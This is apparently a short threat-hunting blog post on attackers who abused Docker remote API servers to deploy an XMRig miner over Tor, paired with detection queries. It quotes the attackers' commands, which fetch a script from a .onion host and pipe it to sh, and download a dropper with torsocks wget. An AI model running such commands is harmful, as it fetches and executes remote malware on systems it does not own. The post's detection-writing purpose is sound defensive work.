173. Adversaries Abuse Docker Remote API Servers and Tor Network

Hello everyone!

We are talking a lot about Windows threats, but let's look at Linux and containers today as these are common targets of those involved in cryptominers distribution.

According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command was executed:

apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh

Despite the fact it was executed in the adversary-created container, it's good to relevant detections. For example, abusing apk to set up Tor:

event_type: "processcreatenix"

AND

proc_file_name: "apk"

AND

cmdline: "add" AND "tor"

One more thing - using cURL over Tor:

event_type: "processcreatenix"

AND

proc_file_name: "curl"

AND

cmdline: ("proxy" AND "socks5h" AND "9050")

Also, the threat actors used torsocks to route traffic through the Tor network and downloaded a Zstandard-compressed (.zst) payload:

torsocks wget -O /tmp/system.zst "http://2h573qd[.]onion:9000/binary/system-linux-$( uname -m).zst"

Here, for example, we can hunt for torsocks abuse to run wget or curl:

event_type: "processcreatenix"

AND

proc_file_name: "torsocks"

AND

cmdline: ("wget" OR "curl")

The payload is a dropper for the XMRig cryptocurrency miner! That's it!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge